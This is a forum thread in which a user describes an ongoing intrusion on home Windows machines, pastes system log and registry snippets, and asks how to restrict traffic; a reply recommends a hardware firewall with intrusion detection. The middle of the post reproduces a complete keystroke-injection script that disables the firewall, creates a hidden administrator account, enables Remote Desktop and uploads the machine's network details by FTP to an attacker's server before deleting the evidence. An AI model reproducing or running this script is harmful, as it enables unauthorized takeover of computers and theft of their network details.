Fighting what seems a losing battle at the moment. Hacker vs me and I'm lost

[meows]

39

I owned a internet service provider service for a number of years and in 1996 Some guys from Russia and China came calling with a brief appearance from a group in Sweden of all places. It was a 6 month battle. Short for a war, but after much grief on both sides I was able to remove the swine and cast them over the cliff's to their death. Yes it was a Windows NT Server farm and I had just started moving to Unix.

Now with just a couple XP and Win7 boxes I play around with things to attempt to keep my brain from, stagnating although my daughter says it is way to late to prevent that.

The issue is something got through many layers of firewalls, virus and  malware programs. I thought I has cast it asunder at least 10 times now. However I0 minutes ago I see in my Monitor folder/drive changes. Windows Trusted Installer has determined .... and then a few seconds later a new NTDmini.DAT file is generated.

now after trying to log port sniffers and TCP-UDP end point and so on it is very hard to see anything when there are over 200 people hitting to your computer within a second or two.  The only thing I have found that helps is to block 65,000+ ports and only leave 6 to 12 ports open.

The attackers latest attempt was from hidden IP addresses. 233.216.xxx,xxx and a non existent domain www.niser.org

ntdll.dll!RtlRegisterThreadWithCsrss+0x197    01A90000    01A8E000    00002000    7FFDD000    

0025E414 0025E4BC  -> 2015-03-24    11:12:57:072    2268    ef8    Misc      = Module: C:\Windows\system32\
 DETAIL -
 7 user registry handles leaked from \Registry\User\S-1-5-21-3132887318-2642499473-540075541-1000:
Process 1340 (\Device\HarddiskVolume2\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3132887318-2642499473-540075541-1000\Software    
HKLM\SYSTEM\ControlSet001\Control\Session Manager    PendingFileRenameOperations    REG_MULTI_SZ    \??\C:\Users\xxxxxx\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7}\fpb.tmp;;\??\C:\Users\xxxxxxx1\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7};;;    3/26/2015 6:32:16 PM    171    

Anyway I am wondering how to stop all traffic other than traffic from a specific web page domain or require a ALLOW access to this content.  I will kill this but want something to fight back with. There has to be a way to actually close a port and lock the darn door,

Example here that this is happening.

expandcollapse popup

Target: Windows 7
Description: Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file.



DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING netsh firewall set opmode mode=disable
ENTER
DELAY 400
STRING ALT y
ENTER
DELAY 400
STRING net user /add username password
ENTER
DELAY 400
STRING net localgroup administrators username /add
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
ENTER
DELAY 400
STRING sc config TermService start= auto
ENTER
DELAY 400
STRING net start Termservice
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ipconfig /all > number.txt
ENTER
DELAY 400
STRING ftp -i ftp server
ENTER
DELAY 400
STRING login name
ENTER
DELAY 400
STRING login password
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING PUT number.txt
ENTER
DELAY 2000
STRING bye
ENTER
DELAY 400
STRING del number.txt
ENTER
DELAY 400
ALT SPACE
STRING c

So sorry I know this is not anyone's problem. Unless it happens to you. The code posted if from a Gov admin that caught after it was posted to a forum. There was some kind of Stopping or disabling the BFE service in the top of the script (i did not receive that part). He did test it and was blown away because it worked and he gained access to another departments computers. *so i was told*

If there is something that can point me in the direction to restrict TCP/UDP i would be grateful.

[jvanegmond]

Windows Firewall can do this out of the box if you go to advanced settings, but I presume you know that. When an attacker has arbitrary code execution on your machine, you're going to fight a losing battle. Keep them out in the first place on the network level. So if you're doing this kind of stuff, I honestly suggest buying a hardware firewall (with decent IDS if you have the money) and letting that manage your DMZ. If it's just a hobby, look at owned stuff a few years old.